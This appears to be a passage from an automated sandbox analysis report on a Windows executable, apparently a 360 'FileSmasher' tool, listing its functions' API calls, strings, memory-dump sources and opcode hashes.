                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dbfa4870adc45b631622be3ca2592a958701174f62ce168f61f50a2c33284457
                                • Instruction ID: 48852144169400102215830900a77111febc21c0817d92a7057d820840cf8b63
                                • Opcode Fuzzy Hash: dbfa4870adc45b631622be3ca2592a958701174f62ce168f61f50a2c33284457
                                • Instruction Fuzzy Hash: F45106B2E041249AEB248B24DD84BFA7775EBC5310F1081BBE90E67684D67C5EC1CF5A
                                Function 0048C370 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: c4f854496fe7d8e591f69f599d75b85a0d4fbbe213d946b15adbcdf1b5ac5b02
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 61115BB724005243D614AA3DC8F45BFA395EBC532072C8B7BD8424B748D23AD997972C
                                Function 00462790 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 302windowthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 004627BE
                                • EnterCriticalSection.KERNEL32(?), ref: 004627D2
                                • LeaveCriticalSection.KERNEL32(?), ref: 004627EA
                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00462820
                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0046282F
                                • GetSystemMetrics.USER32(0000000C), ref: 00462846
                                • GetSystemMetrics.USER32(0000000B), ref: 0046284B
                                • LoadImageW.USER32(?,00000005,00000001,00000000), ref: 00462853
                                • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00462868
                                • GetSystemMetrics.USER32(00000032), ref: 0046287B
                                • GetSystemMetrics.USER32(00000031), ref: 00462880
                                • LoadImageW.USER32(?,00000005,00000001,00000000), ref: 0046288C
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0046289D
                                • SetWindowTextW.USER32(?,-00000004), ref: 00462915
                                • MulDiv.KERNEL32(00000082,?,00000064), ref: 00462A1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MetricsSystem$CreateCriticalEventImageLoadMessageSectionSend$CurrentEnterLeaveTextThreadWindow
                                • String ID: FileSmasher$FileSmasher\maindlg.xml$IDS_WINDOW_TITLE$tool_header_bg
                                • API String ID: 2178025920-2066410532
                                • Opcode ID: 80b7c20c52323f7a20dcdbe1bc36ffb38e72473d230269f20547debb6dc53802
                                • Instruction ID: f15ceb1fff673dbdcb3d588ef808f44365002a63d70d00c3430f4cc7cbce6478
                                • Opcode Fuzzy Hash: 80b7c20c52323f7a20dcdbe1bc36ffb38e72473d230269f20547debb6dc53802
                                • Instruction Fuzzy Hash: 70B1C371604340AFE710DF64CC85B5A77A8EF84B14F14452EF944AB2D1EBB9E805CB9A
                                Function 00444290 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 117registrywindowCOMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(004E38E8,CrashReport.dll,-00000010,00000000), ref: 004442A1
                                • RegisterWindowMessageW.USER32(WM_ATLGETHOST,?,?,?,?,?,?,?,?,?,?,?,?,0043E5A6), ref: 004442B2
                                • RegisterWindowMessageW.USER32(WM_ATLGETCONTROL,?,?,?,?,?,?,?,?,?,?,?,?,0043E5A6), ref: 004442BE
                                • GetClassInfoExW.USER32(?,AtlAxWin90,?), ref: 004442DF
                                • LoadCursorW.USER32 ref: 0044431B
                                • RegisterClassExW.USER32 ref: 00444342
                                • _memset.LIBCMT ref: 0044436E
                                • GetClassInfoExW.USER32(?,AtlAxWinLic90,?), ref: 0044438B
                                • LoadCursorW.USER32 ref: 004443CB
                                • RegisterClassExW.USER32 ref: 004443F2
                                • LeaveCriticalSection.KERNEL32(004E38E8,?,?,?,?,?,?,?,?,?), ref: 0044441D
                                • LeaveCriticalSection.KERNEL32(004E38E8), ref: 00444433
                                  • Part of subcall function 004033D0: __recalloc.LIBCMT ref: 004033FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ClassRegister$CriticalSection$CursorInfoLeaveLoadMessageWindow$Enter__recalloc_memset
                                • String ID: AtlAxWin90$AtlAxWinLic90$CrashReport.dll$WM_ATLGETCONTROL$WM_ATLGETHOST
                                • API String ID: 3653313455-3137487555
                                • Opcode ID: d45fea2451c69ab0c6fce59c63813c92c1ba7f286fed2cb9a3203dec539f89e4
                                • Instruction ID: 18c47c28d217803acd38e2e350ea736b05d0220bbaa245b44b76b35cf6954bd6
                                • Opcode Fuzzy Hash: d45fea2451c69ab0c6fce59c63813c92c1ba7f286fed2cb9a3203dec539f89e4
                                • Instruction Fuzzy Hash: 59414BB55083409FC340DF56D888A2AFBE8FBC8755F404A2FF48893261D7B49A04CF9A
                                Function 0042A280 Relevance: 28.7, APIs: 19, Instructions: 225windowCOMMON
                                Download Yara Rule
                                APIs
                                • CreateCompatibleDC.GDI32(?), ref: 0042A314
                                • CreateCompatibleBitmap.GDI32(?,00000004,00000004), ref: 0042A324
                                • SelectObject.GDI32(00000000,00000000), ref: 0042A32F
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042A340
                                • GdipCreateSolidFill.GDIPLUS(000000FF,?,00000000,?), ref: 0042A357
                                • GdipFillRectangleI.GDIPLUS(?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A367
                                • GdipDeleteBrush.GDIPLUS(?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A377
                                • GdipSetTextRenderingHint.GDIPLUS(?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A3A9
                                • GdipGetFontHeight.GDIPLUS(?,?,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF), ref: 0042A3D3
                                • GdipCreateStringFormat.GDIPLUS(00005000,00000000,?,?,?,?,?,?,00000003,?,?,?,?,?,00000000,00000000), ref: 0042A3FD
                                • GetPixel.GDI32(?,00000000,00000000), ref: 0042A476
                                • GdipDeleteBrush.GDIPLUS(?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000), ref: 0042A4A2
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?), ref: 0042A4AB
                                • GdipDeleteFont.GDIPLUS(?,00000000,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF), ref: 0042A4B4
                                • SelectObject.GDI32(00000000,?), ref: 0042A4C1
                                • GdipDeleteFontFamily.GDIPLUS(?), ref: 0042A4CB
                                • GdipDeleteGraphics.GDIPLUS(?,?), ref: 0042A4D4
                                • DeleteObject.GDI32(?), ref: 0042A4E1
                                • DeleteDC.GDI32(00000000), ref: 0042A4EC
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Delete$Create$FontObject$BrushCompatibleFillFormatSelectString$BitmapFamilyFromGraphicsHeightHintPixelRectangleRenderingSolidText
                                • String ID:
                                • API String ID: 2633235991-0
                                • Opcode ID: a097ecd49909bb08ad003b2c23f3e470d2e756214d58951aae84d30e78e4d7e4
                                • Instruction ID: 4e80d2d929e380933f70dbde1135d6243de09a489c9987241f35bfaf6d66798b
                                • Opcode Fuzzy Hash: a097ecd49909bb08ad003b2c23f3e470d2e756214d58951aae84d30e78e4d7e4
                                • Instruction Fuzzy Hash: 77818071A00219EFCB10EFA5DC84AEEBBB8FF45314F11811EF914A7241D778A945CBA9
                                Function 00440790 Relevance: 25.8, APIs: 17, Instructions: 329COMMON
                                Download Yara Rule
                                APIs
                                • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004407EC
                                • IsWindow.USER32(?), ref: 004407FB
                                • GetSysColor.USER32(00000005), ref: 0044083B
                                • GetWindowLongW.USER32(?,000000F0), ref: 004408EB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$ColorLongRedraw
                                • String ID:
                                • API String ID: 4056730343-0
                                • Opcode ID: ca1abdbc874770277728bbe36bf4a117513bd8c364929f1d7c7642bff420dd03
                                • Instruction ID: 98fc8f41d6d163022ece6be5d9d68c41223d0c7f9aca896b60a9b6a68b633fc1
                                • Opcode Fuzzy Hash: ca1abdbc874770277728bbe36bf4a117513bd8c364929f1d7c7642bff420dd03
                                • Instruction Fuzzy Hash: E4C19D742042029FE710DF59C884B6B77E9EF88714F14852EFA449B3A1CB38EC55CBA9
                                Function 0043E980 Relevance: 25.7, APIs: 17, Instructions: 237commemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 0043E9E7
                                • GetWindowLongW.USER32(?,000000EC), ref: 0043E9F7
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0043EA02
                                • GetWindowLongW.USER32(?,000000EB), ref: 0043EA10
                                • OleUninitialize.OLE32 ref: 0043EA22
                                • OleInitialize.OLE32(00000000), ref: 0043EA2F
                                • GetWindowTextLengthW.USER32(?), ref: 0043EA36
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 0043EA93
                                • SetWindowTextW.USER32(?,004BCD08), ref: 0043EA9F
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0043EAC8
                                • GlobalLock.KERNEL32(00000000), ref: 0043EAD5
                                • _memcpy_s.LIBCMT ref: 0043EAE7
                                • GlobalUnlock.KERNEL32(00000000), ref: 0043EAF0
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 0043EAFD
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0043EBF9
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$GlobalLong$Text$AllocCreateInitializeLengthLockProcStreamUninitializeUnlock_memcpy_s
                                • String ID:
                                • API String ID: 2032182138-0
                                • Opcode ID: c61d0fddc6ab4fcec40ef0815219ec5960cc77f8ce0d751a65aeea9c773c103f
                                • Instruction ID: c0f04b444a69283280af9de96a8451d22a1e08eb451a14ff96d4003cf6866933
                                • Opcode Fuzzy Hash: c61d0fddc6ab4fcec40ef0815219ec5960cc77f8ce0d751a65aeea9c773c103f
                                • Instruction Fuzzy Hash: 2C816C71901215AFDB11EF69CC45FAFBBB8AF48310F14465AF502A7291DB38AD01CBA9
                                Function 00464950 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 156windowthreadCOMMON
                                Download Yara Rule
                                APIs
                                • FindWindowW.USER32(Q360PromoClass,00000000), ref: 00464972
                                • PostMessageW.USER32(00000000,00000010,00000000,00000040), ref: 0046497F
                                • ShowWindow.USER32(?,00000000), ref: 0046498E
                                • SetEvent.KERNEL32(?), ref: 004649AA
                                • CloseHandle.KERNEL32(?), ref: 004649B3
                                • SetEvent.KERNEL32(?), ref: 004649C9
                                • CloseHandle.KERNEL32(?), ref: 004649D2
                                • GetCurrentThreadId.KERNEL32 ref: 00464A73
                                • EnterCriticalSection.KERNEL32(?), ref: 00464A85
                                • LeaveCriticalSection.KERNEL32(?), ref: 00464ACE
                                • PostQuitMessage.USER32(00000000), ref: 00464AF9
                                • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00464B15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CloseCriticalEventHandleMessagePostSectionWindow$CurrentEnterExceptionFindLeaveQuitRaiseShowThread
                                • String ID: Q360PromoClass$Q360PromoClassLow
                                • API String ID: 1959851942-3614897671
                                • Opcode ID: 1ef698cecd03d82646469f03171d86888c3e6871567659796a289cba438008e2
                                • Instruction ID: 56d757dafd0a474b3a4655ae57a73f5c183d514a9328f596b2a00afd5098ce85
                                • Opcode Fuzzy Hash: 1ef698cecd03d82646469f03171d86888c3e6871567659796a289cba438008e2
                                • Instruction Fuzzy Hash: E2519475600300AFDB10DF65DC84B5773A9BF88714F144A2EED459B392EB38E801CBA9
                                Function 0042E660 Relevance: 24.2, APIs: 16, Instructions: 211memorywindowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042E686
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0042E69D
                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 0042E6E5
                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E70F
                                • GdipAlloc.GDIPLUS(00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E722
                                • GdipGetImageGraphicsContext.GDIPLUS(?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E740
                                • GdipSetPixelOffsetMode.GDIPLUS(00000000,00000002,?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E752
                                • GdipSetSmoothingMode.GDIPLUS(?,00000004,00000000,00000002,?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?), ref: 0042E763
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Image$AllocMode$BitmapContextCreateFromGraphicsHeightOffsetPixelScan0SmoothingWidth
                                • String ID:
                                • API String ID: 3931329870-0
                                • Opcode ID: bf41e37deee3c6a791cd34d9b4c0ec6da0c23dac44a51bc07fc3790bb794bcc5
                                • Instruction ID: f30007c343395d4d28bcef7463d0b73f766beae805a266994da5c3ec7389f55b
                                • Opcode Fuzzy Hash: bf41e37deee3c6a791cd34d9b4c0ec6da0c23dac44a51bc07fc3790bb794bcc5
                                • Instruction Fuzzy Hash: 6B7140B0A0020AEFDB10DFA6D985AAFBBF8EF44744F10895EE959E7240E734DD418B54
                                Function 0047A2F0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 114memorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32(1D1D1D8C,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A336
                                  • Part of subcall function 0047A070: _vswprintf_s.LIBCMT ref: 0047A09A
                                • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A36B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A37E
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A38E
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A3AC
                                • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A3BD
                                • __CxxThrowException@8.LIBCMT ref: 0047A3F7
                                • __CxxThrowException@8.LIBCMT ref: 0047A421
                                • ReleaseMutex.KERNEL32(00000000), ref: 0047A439
                                • CloseHandle.KERNEL32(00000000), ref: 0047A444
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
                                • String ID: %s %u$(bN$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                • API String ID: 3526415198-3071653440
                                • Opcode ID: 0d8cee2153334fb997b04acabb6204f53038666f2265861be4062519cb960c75
                                • Instruction ID: e194817bf2e7d16d4174f96520751dd94e0059aed73972de63d2eca86cb6f0f9
                                • Opcode Fuzzy Hash: 0d8cee2153334fb997b04acabb6204f53038666f2265861be4062519cb960c75
                                • Instruction Fuzzy Hash: 8E41D7719002449FCB10EFA4DC85BEE77B8EB44714F10863EE909A7291DB7D49498B5A
                                Function 00474900 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360MachineSignature,00000000,00020119,?,00000000,004BE8F0,00000000,?,?,?,00474D3E,?,?), ref: 00474926
                                • RegQueryValueExW.ADVAPI32(?,Operator,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 0047496D
                                • RegQueryValueExW.ADVAPI32(?,IssueDate,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 004749B4
                                • RegQueryValueExW.ADVAPI32(?,ExpirationDate,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 004749F3
                                • RegQueryValueExW.ADVAPI32(?,SignData,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 00474A2A
                                • RegCloseKey.ADVAPI32(?), ref: 00474A68
                                • RegCloseKey.ADVAPI32(?,?,?,00474D3E,?,?), ref: 00474A81
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: QueryValue$Close$Open
                                • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                • API String ID: 2895014784-1479031278
                                • Opcode ID: c692cba51cfd2066502bd6aa15758e4fc88e9a17b99816016dcb8874bc330d81
                                • Instruction ID: 8bcaa0cccb2167316de61ac67ccb373c22614a393bd1e79f74d8290c9f3a834f
                                • Opcode Fuzzy Hash: c692cba51cfd2066502bd6aa15758e4fc88e9a17b99816016dcb8874bc330d81
                                • Instruction Fuzzy Hash: 015146B16443029FD320CF58D881A7BB7E8EBD8790F05492EF599D3210E734E909CB59
                                Function 0042A660 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 374memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GdipAlloc.GDIPLUS(0000000C,?,?,?), ref: 0042A70D
                                • GdipPrivateAddMemoryFont.GDIPLUS(?,?,?,0000000C,?,?,?), ref: 0042A739
                                • GdipAlloc.GDIPLUS(0000000C,?), ref: 0042A898
                                • GdipPrivateAddMemoryFont.GDIPLUS(?,?,?,0000000C,?), ref: 0042A8BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
